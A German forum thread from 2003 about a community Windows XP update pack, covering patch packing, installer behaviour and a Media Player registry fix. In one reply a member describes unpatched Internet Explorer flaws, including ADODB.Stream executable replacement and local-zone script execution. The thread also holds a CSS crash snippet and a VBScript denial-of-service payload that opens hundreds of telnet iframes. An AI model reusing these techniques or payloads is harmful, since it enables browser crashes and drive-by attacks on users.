[Meltdown]

@Rika

1. Wenn das ALLES da rein kommt, wie schaffst Du es dann eigentlich noch
das Ganze auf 50-55 MB zu packen. Du erwähntest mal sowas. Das 1.5er-Pack
hatte ja schon knapp 50 MB.

Oder stammt der Wert noch aus der Zeit, wo Du das ganze noch mit einer
besseren Kompression versehen wolltest ?!

2. Beim vollständig gepatchten IE also noch 6 Lücken mit Status "critical".
Wovor muß ich mich noch genau in acht nehmen (sofern man mit dem IE
überhaupt surft) ?!

3. 6x critical. Dann heißt das aber auch bei Dir wahrscheinlich auch, das da
noch mehr ist.

4. Thema: "spmsg.dll". Kannst Du Dir da überhaupt irgendwas aufheben,
da bedingt sich doch so vieles ?!

5. Stichwort Aufheben: Microsoft hat sich garantiert noch mehr aufgehoben,
um für ein 1.7er noch genug Material zu bieten. Aber das ist ein anderes Thema...

6. Ich bin mal unverschämt. Aber es gibt auch einen neuen Flash-Player. Jedenfalls bekomm ich einen Download angeboten, sobald ich ins Internet gehe und vorher das "flash_player_7_ax" aufgespielt habe.

Nur: In Deiner 1.6er Liste taucht nirgendwo mehr der Flash-Installer auf. Hat der
einen anderen Namen bekommen, oder ist der rausgeflogen. (weil Nebenschauplatz) ?!

7. Noch (hoffentlich konstruktiv empfundene) Kritik zum alten 1.5er Pack. Du hattest für die Installation damals die AUTO-Variante empfohlen. Das würde auf jeden Fall laufen... (o.ä.)

Bei der Vorgehensweise wird aber zum Beispiel dieses "Update für das Help- und Supportcenter v1.0.0.2" in der Home - Variante auch auf XP-Pro Systemen
installiert. Ist das Absicht bzw. Bedingung für ein saubere Aktualisierung
oder nur überflüssig/gefährlich ?!
Normalerweise braucht das doch nicht. Wenn dem so ist, kann ich die AUTO-
Variante aber vergessen, und muß alles "benutzerdefiniert" selbst auswählen.
Zudem wird das Update zwischendurch auch immer mal wieder unterbrochen
durch Neustarts. Nicht alle Nachfragen lassen sich verneinen. Manchmal fährt das
System auch einfach so runter, und startet hinterher neu.

Das hat momentan dazu geführt, das ich Dein Paket entpackt und auseinandergenommen habe und momentan in 9 Stufen aktualisiere.
Die Datei "Settings.ini" lässt sich ja wunderbar editieren, womit das Ganze
ja dann kein Problem mehr darstellt.

8. Diesen vielzitierten K7-Treiber muß ich allerdings seit Jahr und Tag "per Hand"
im Geräte-Manager anmelden - sonst krieg ich die neue Versions-Nr. 1152 nicht
zu Gesicht. Trotz Deiner Batch-Datei. Woran kann das liegen ?!

So war das ja eigentlich nicht geplant von Dir, oder ?!

Wird sich da was ändern im 1.6er Pack, bzw. kann ich hinterher noch drin eingreifen in den Installationsablauf ?!

Zu viel Text auf einmal. Entschuldigung schon mal im voraus, wenn ich Dich
von der Arbeit abhalte...

Dieser Beitrag wurde von Meltdown84 bearbeitet: 19. November 2003 - 18:06

[Meltdown]

Zitat (shelby: 19.11.2003, 17:45)

Frage @Rika:

Der Kernel-Patch 1240 ist immer noch nicht offiziell. Ist der Patch in jeder Hinsicht in Ordnung?

Tja, ich fürchte sogar das der 1240er nie offiziell wird. Jedenfalls nicht für
die Massen. Im SP2 wird eh schon ein 2004er Kernel drin sein. Dann interessiert
der 1240er auch keinen mehr.

Ich rede wie gesagt vom Kernel-Update, der die Build-Nr. auf xpsp2.030618-1119 hochschraubt. Nur damit da keine Verwechslungen auftauchen.

Bis dahin aber gilt, das wir wohl nehmen müssen was wir kriegen. Auch wenn es
sich hinterher als bugbehaftet herausstellt. Aber das trifft wohl auch noch auf
das XP-System zu, wenn es dann mal demnächst mit dem 1.6er
Pack versehen wurde.

Wenn Du in der Hinsicht allerdings ängstlich bist, wirds wohl schwierig werden
Dich bis zum SP2 bei Laune zu halten.

Gefunden hat man das File auf einem ASUS-Server, wo es irgendwas anderem
beilag. (GraKa-Treiber, oder ähnliches.) Ich weiß das nicht mehr so genau.
Die Meldung war hier auch in den News zu lesen. Das kann man noch finden,
wenn man die Boardsuche in Anspruch nimmt.

Ach ja: Natürlich war es undokumentiert...

[tm]

hat jemand eine ahnung, wo es denn
dllversionfix.reg für wmp9 gibt, den rika in seiner liste aufgeführt hat ?
und für was der gut ist ?

danke !!

[Meltdown]

Zitat (tm: 19.11.2003, 19:28)

hat jemand eine ahnung, wo es denn
dllversionfix.reg für wmp9 gibt, den rika in seiner liste aufgeführt hat ?
und für was der gut ist ?

danke !!

Den hab ich auch schon gesucht.

Rika meinte mal, er müßte "für konsistente Versionsnummern" beim Patchen des WMP9 sorgen. Damit meinte er dann wohl einige DLL-Dateien so wie es aussieht.

Das Teil ist aber wahrscheinlich eine Eigenkreation von ihm, speziell für das
Update-Pack. Microsoft hat ja keine Ahnung vom Patchen, das weißt Du ja.

Da muß man wohl gelegentlich selbst nachhelfen.

Ich hab Da ehrlich gesagt keine Hoffnungen, das wir das Teil vor Veröffentlichung des 1.6er Packs zu sehen bekommen.

Abwarten...

[Rika]

@MZottel:

1. Sorry, aber ich komm mit dem Sortieren kaum noch hinterher. Als Student hat man halt doch viel zu tun - im Rechnerkabinett übernachten, Partys und sekbständige Nahrungsversorgung...

2. Müsstest doch eigentlich wissen, dass bei mir nix Insicheres draufkommt. Die Originalen ICQ-CLients sowieso nicht, weil die doch sehr regelmäßig durch Sicherheitslücken auffallen - und andere ICQ-Clients nicht, weil ICQ ein extrem unsicher designtes Netzwerk ist. Beides resultiert daraus, dass Mirablis damals doch nur möglich shcnell und gewinnorientiert ein Chatnetzwerk aufbauen wollte - und deshalb nicht an Sicherheit dachten... Ich kann's dir aber mailen oder wohin uploaden.




@Meltdown84:

1. Stichwort: Angewandte Redundanzkodierung. Einige Sachen in den Patches sind doppelt, aber weil die Patches komprimiert sind, lässt sich dies nicht zur weiteren Komprimierung nutzen. Deshalb entpacke ich sie, packe sie unkomprmiert in RAR-SFX-Archive und nutze dann die Tatsache aus, dass die gleichen Dateien in den unkomprimierten Archiven in genau den gleiche Mustern gespeichert werden - was man mit RAR wiederum dann sehr gut komprimieren kann. Fast so gut wie doppelte Dateien...
In der neuen Version versuche ich es dann so, dass ich den Patch-Installer von MS verwende, um praktisch die Dateien der einzelnen Patches sozusagen als einen einzige Patch installiere, was es ermöglicht, die überflüssigen Dateien vollständig zu beseitigen. Überflüssig sind nämlich einige, so in der Art: Patch A installiert Datei X in Version 1 und Datei Y In Version 1. Patch B installiert nur Datei X in Version 2. Will man dann die Modularität der einzelnen Patches erhalten, muss man diese Dopplung leider implementieren. Nach der neuen Methode ist das nicht mehr nötig.

2. Besonders diese hier (ich erkläre jetzt natürlich nichts so, dass man daraus direkt einen Exploit erstellen könnte):

a.) Data Source Object Exploit. Mittels OBJECT-Tag wird eine nichtexistente lokalen XML-Datei eingebuden und dann auf deren Objecte zugegriffen. Da das XML-Object damit in der lokalen Zone erstellt worden ist, kann man Script mit lokalen Rehcten ausführen. Abhilfe: ActiveX in der lokalen Zone (Zone: Arbeitsplatz) deaktivieren. geht nur mit dem normalen IE-Interface gar nicht, dazu braucht man Tuning-Tools bzw. einen direkten Eingriff in die Registry. Genau letzteres habe ich seit dem WF UP 1.4 mit ausgeliefert. Diesse Lücke ist seit zwei Jahren nicht gepatcht!
b.) ADODB-Streams. Mit JavaScript ein ADODB-Stream-Objekt erstellen und die Methode ADODB.Save verwenden. Der IE prüft dann die Sicherheit anhand des Dateinamens, wenn man aber serverseitig mit 'nem CGI- oder PHP-Script eine Weiterleitung auf eine EXE-Datei macht, kann man damit jede beliebige EXE-Datei auf den Rechner runterladen und damit eine vorhanden datei ersetzen. Besonders wichtig sind dabei die wmplayer.exe und die notepad.exe, weil man die dann mit Links auf eine WMV-Datei bzw. ein view-source: automatisch starten kann - und damit den Rechner übernehmen. -> Lösung: JavaScript deaktivieren.
c.) Man kann mittels einer Serverweiterleitung und 'ner WMV-Datei die Media Player Bar im IE starten und ihr eine DLL-Datei aus dem Netz unterjubeln. -> Abhilfe: keine
d.) Man bindet den Media Player als Plugin auf eine Seite ein und gibt als Dateiquelle eine beliebige Datei an. Mit JavaScript kann man dann anhand der internen Ffehlernummer festellen, ob nun der Fehler "Ungültige Datei" oder "Datei nicht vorhanden" auftrat - und damit feststellen, ob eine lokale Datei existiert. Abhilfe: ActiveX und Plugins deaktivieren. Seit zwei Jahren nicht gepatcht!
e.) Man nehme eine EXE-Datei und hönge dort eine HTML-Datei dran, die im JavaScript-Teil den Aufruf document.execCommand(ShellExecute(document.locatio
n)); enthält. Der IE erkennt sie als HTML-Datei, führt das Script, durch das Script versucht anhand der Header der Datei ihren Typ zu erkennen, erkennt sie als EXE-Datei und führt sie ohne weiteres aus. Abhilfe: Keine. Die Lücke ist laut Microsoft nur in Windows 2000 SP4 vorhanden und wurde mit SP4 gefixt. Totale Lüge. Sie existiert in allen Windows-Versionen und wurde mit SP4 nicht gefixt. Sie wurde nur im englischen Windows 2003 Server im Beta-SP1 Build 1039 gefixt. Die Lücke ist nur eine Vriante einer viel teiferen System-Lücke und kann auch dazu genutzt werden, um Adminsitratorrechte zu bekommen. Die Lücke ist seit April öffentlich bekannt, laut IIS aber seit mehr als zwei Jahren intern und auch bei MS bekannt.
f.) CDROM open error. Eine weitere schöne Lücke im Media Player Control, mit der man alle Laufwerke, die den Befehl "Auswerfen" verstehen, auch öffnen kann, wie z.B. CDROM-Laufwerke und ZIP-Drives. War sehr bekannt als "Tassenhalter"-Bug. Abhilfe: ActiveX und Plugins deaktivieren.
g.) JAVA Form Submit Bug. Man erstelle ein Form mit einem Upload-Feld und übergebe ihm den Namen einer lokalen Datei. So, der IE verhindert zwar, dass man scriptgesteuert das Form übertragen kann - aber man kann mittels Java vom JavaScript den Event-Handler auslesen, ihn auf einen zweiten Event-Handler weiterleiten und diesen dann wieder mit JavaScript nutzen, um das Form doch noch zu submitten und die Datei zu übertragen. Abhilfe: Scripting von Java-Applets deaktivieren. Genau wegen solchem Schwachsinn wurde dieses Scripting nie in Java und JavaScript aufgenommen - was Microsoft nicht davon abhielt, genau diesen sicherheitstechnischen Schwaschsinn zu implementieren und sogar noch defaultmäßig zu aktivieren.
h.) CSS Parsing Error.Bei bestimmten Proto-Typen kann einige Pseudo-Klassen wie z.B. first-letter nicht mit diversen Contextual Selectoren kombinieren - und stürzt ab. <style> .test {border: 1px solid black;}.test p:first-letter { font-size: 2em; font-weight: bold;float:left; border: 1px solid red;}</style>
<div class="test"><p><strong>Absturz!</strong>&nbsp;</p></div>
Abhilfe: keine.

Und das sind nur die extremsten sicherheitskritischen Lücken. Wir wollen mal gar nicht von den vielen kleinen Sicherheitslücken reden, mit denen man nur Textdateien aulesen kann. Oder die vielen tausenden Anzeige-Fehlern, die Nichtunterstützung von PNG-Transparenzen, CSS2+3 und anderen Kleinigkeiten...

6. Ja, der wird auch drin sein. Hab ihn nur nicht mit dazugeschrieben.

7. Ich hab es so gelassen, das es wowohl auf WinXP Home und Pro aufgespielt wird. Es ist 100%ig ungefährlich und es wird nur das zu dem System passende Update eingespielt, während das andere dann intern abbricht.

8. Hmm.. Bei mir hatte es jedenfalls funktioniert - meistens zumindest. Ein einfaches Kopieren in den Ordner drivers bzw. inf sollte es aber doch schon bringen. Egal, mit der neuen Update-Variante dürfte das dann wohl 100%ig hinhauen.

Den Installationsverlauf wirst du sicherlich noch ändern können, aber in der neuen Variante wird das halt vollkommen anders gehen.




@shelby: Bei mir funzt er ohne Probleme, und ich habe das instabilste System im Umkreis von 20 km...




@tm:
Hast du jemals versucht, die englischen Patches für den WMP9 auf einem deutschen System zu installieren. Da geht meist direkt gar nicht, und selbst Entpacken und dann Rechtsklick auf die INF -> Installieren funzt nicht immer. Da bleibt nur noch das manuelle Kopieren der Dateien, was aber dann meist zu einer Meldung der Form "Die Datei blablabla.dll ist in der Version 0.8.15, erwartet wurde aber 0.8.01.". Und diese Fehlermelung wirst du erst dann wieder wegbekommen, wenn du in der Registry unter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Setup\Installed Versions die Erwartungs-Werte den DLL-Versionen angleichst. Ebenso gibt es ein Problem mit der Kombination diverser Plugins, z.B. DFX und CSII, welches zu ständigem Stottern des Tons führt. Da wiederum muss man unter HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\MediaPlugins\DSPConfig\{GUID} den Wert Priority löschen.

Und dafür ist die .reg-Datei da.

[tm]

vielleicht kann uns rika den fix ja schonmal vorab zur verfügung stellen ?


@rika
noch eine anmerkung/frage zu deiner liste:

windows xp\1.5\jet40repl.exe müsste eigentlich doch durch KB829558 wegfallen ?

windows xp\1.5\msxml4sp1
wenn man die version nummer anschaut, steht da immer was von sp2
und im internet habe ich es auch schon gelesen. müsste es eigentlich nicht das sp2
sein ?

ansonsten fehlt mir aus der liste von rika
nur noch
für den ie 818506 und 820369
und der kernel patch 817027

werde es mal bei der hotfix hotline versuchen.


noch eine frage an alle die sich ebenfalls mit den packs beschäftigen.
wie kann ich die von rika angesprochenen abhänigkeiten sehen ?
muss ich jeden hotfix entpacken und bei den dateien (unter eigenschaften, version)
die versionen gegeneinander prüfen, also schauen was neuer ist, etc. ?
oder benutzt ihr da irgendein tool ?

[tm]

In der neuen Version versuche ich es dann so, dass ich den Patch-Installer von MS verwende, um praktisch die Dateien der einzelnen Patches sozusagen als einen einzige Patch installiere,.......

@rika
noch eine frage:
kommt der neue installer nun doch schon in der version 1.6 ?
und wird das eigentliche setup und die settings.ini der bisherigen form
bleiben (wäre schön, dann könnte man immer selbst bis zu einer neuen version
alle neuen updates einbinden) ?

Dieser Beitrag wurde von tm bearbeitet: 19. November 2003 - 20:16

[Rika]

>windows xp\1.5\jet40repl.exe müsste eigentlich doch durch KB829558 wegfallen ?
Nein. Schau dir doch mal die Dateien an. JET ist halt nicht gleich JET - naja, typisch Microsoftsches Patch-Chaos...

>windows xp\1.5\msxml4sp1
>wenn man die version nummer anschaut, steht da immer was von sp2
>und im internet habe ich es auch schon gelesen. müsste es eigentlich nicht das sp2
>sein ?
Es wird auch als MSXML 4.0 SP2 angeboten, aber enthalten ist nur SP1. Typisch Microsoft!

>ansonsten fehlt mir aus der liste von rika
>nur noch für den ie 818506 und 820369
>und der kernel patch 817027
>werde es mal bei der hotfix hotline versuchen.

Nicht notwendig. Ich uppe es mal schnell.

>noch eine frage an alle die sich ebenfalls mit den packs beschäftigen.
>wie kann ich die von rika angesprochenen abhänigkeiten sehen ?
>muss ich jeden hotfix entpacken und bei den dateien (unter eigenschaften, version)
>die versionen gegeneinander prüfen, also schauen was neuer ist, etc. ?

Genau das. Zeitaufwendig, langweilig und schlecht automatisierbar. Eine undankbare Arbeit, bei der man aber auch sehr viel lernen kann.


>und im internet habe ich es auch schon gelesen. müsste es eigentlich nicht das sp2
>sein ?

Denk mal nach, was ein Service Pack ist. Wann immer ein Problem auftritt, das gepatcht werden muss, dann wird ein Patch geschrieben - also der Code geändert und neu kompiliert, womit sich eine höhere Build-Nummer der jeweiligen Datei ergibt. Die sicherheitkritischen Sachen sowie bei schwerwiegenden Problemen, die viele User haben, wird die Datei als Patch veröffentlicht. Weniger wichtige Sachen werden nur auf Anfrage zur Verfügung gestellt, und einige Sache gar nicht. Nebenbei werden auch einige neue Funktionen in den Code eingebaut, z.B. eben die Firewall-Funktionalität verbessert.
Und wenn nun die Menge an Patches Überhand nimmt, die neuen Funktionen vollständig und reichhaltig sind, sowie die kleinen Ergänzungspatches in Beta-Servicepacks getestet wurden, und eine sinnvolle lange Zeit verging, dann werden einfach alle Dateien gesammelt, mit 'nem Installer versehen und als Service Pack herausgebracht.

Von daher ist es absolut logisch, dass alle Dateien aus Patches nun als SP2 deklariert sind und meist unverändert auch so im SP2 vorkommen werden.

[Rika]

>kommt der neue installer nun doch schon in der version 1.6 ?
Wenn hier so gedrängelt wird... dann nein.

>und wird das eigentliche setup und die settings.ini der bisherigen form
>bleiben (wäre schön, dann könnte man immer selbst bis zu einer neuen version
>alle neuen updates einbinden) ?

Wie ich schon sagte, ich werde dann zuküntig den Update-Installer von MS verwenden. Dann kann man, natürlich mit anderen Befehlen, in der update.inf rumpfuschen.

BTW: Download unter http://home.t-online...e/prinzessin12/
BTW2: Hab doch glatt in meiner Liste noch zwei schöne Bugs vergessen: Den IFRAME-SRC-Bug kombiniert mit dem TELNET-URL-Bug. Einfach mal in dem Upload-Dir die inaktiv_index.html anschauen...

*nicht über die URL wundern* - Webspace bei T-Online = Namen gebunden ans eMail-Addy. Und weil meine dumme Schwester beim Umstieg auf T-DSL ihr spamverseuchtes eMail-Addy behalten wollte, hat der Webspace jetzt leider auch diesen Alias-Namen.

[MZottel]

@ Rika

1. Das mit wenig Zeit kenn ich gut, da ich selber zu dem Studentenfolk gehöre.
Wenn Du irgendwie Hilfe in der hinsicht brauchst kannst Dich gerne melden!

2. Ja also wer sehr nett wenn Du mir das mailen könntest damit ich da mal reinschauen kann. B)

Meine Adresse findest Du unter meinen Details. Hatte auch schon versucht Dich über Mail zu erreichen aber irgendwie schluckt der Deine Adresse nicht!

[Rika]

Saug's dir, die URL hab ich oben angegeben.

[tm]

@rika
>und im internet habe ich es auch schon gelesen. müsste es eigentlich nicht das sp2
>sein ?

Denk mal nach, was ein Service Pack ist. Wann immer ein Problem auftritt, das gepatcht..........................................
.............

das hast du missverstanden. das bezog sich alles auf
meine frage mit msxml4sp1.
macht aber nichts.

die sache mit dem installer war nicht so gemeint.
ich wollte dich nicht drängeln !!!


ich hoffe, ich nerv dich nicht,
aber die inaktiv ... meldet bei mir einen virus und zeigt nur was mit denial of service
an !!?
könntest du die beiden bugs evtl. anderweitig bekanntgeben ?

und noch ein letztes, kannst du auch noch den dllversionfix.reg
uppen ?

danke !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Dieser Beitrag wurde von tm bearbeitet: 19. November 2003 - 21:03

[MZottel]

ja hab schon gesehen!
Thanx

[Rika]

>aber die inaktiv ... meldet bei mir einen virus und zeigt nur was mit denial of service
>an !!?
>könntest du die beiden bugs evtl. anderweitig bekanntgeben ?

Naja, es ist eigentlich gar kein Virus, sondern nur ein ungefixter IE-Bug - wird aber von vielen Viren-Scanner erkannt und teilweise sogar erfolgreich blockiert. Dabei kann man mit dem Bug maximalstens einen DoS-Angriff ausführen, aber nichts infizieren oder gar zerstören...

Naja, ich surfe eh mit Mozilla, daher hab ich die Warnung abgeschaltet - warum soll ich was blockieren, was ohenhin ungefährlich ist - man muss ja auch ncit mit einem Pulverfass wie dem IE surfen...

Posten müsste ich den Bug eiegntlich nicht, schließlich kann selbst ein IE-User einfach in der Ordner-Ansicht Rechtsklick->Ziel speichern unter... machen. Aber na schön:

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

>und noch ein letztes, kannst du auch noch den dllversionfix.reg
>uppen ?
Sollte man sich den nicht eigentlich denken können? Na schön:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MediaPlayer\Setup\Installed Versions]
"wmp.dll"=hex:00,00,09,00,03,0c,00,00
"wmploc.dll"=hex:00,00,09,00,af,0b,00,00
"wmplayer.exe"=hex:00,00,09,00,af,0b,00,00

[HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\MediaPlugins\DSPConfig\{51F7FDF0-F24A-4179-80CE-FCD2797941C1}]
"Priority"=-

[HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\MediaPlugins\DSPConfig\{8967E796-9227-425D-9140-419CDA226B30}]
"Priority"=-


Nützt aber nur dann was, wenn du wirklich genau diese DLL-Versionen hast - sprich: die Patches KB817885, wm816044, KB827560 und KB828026 (teilweise manuell) installiert hast.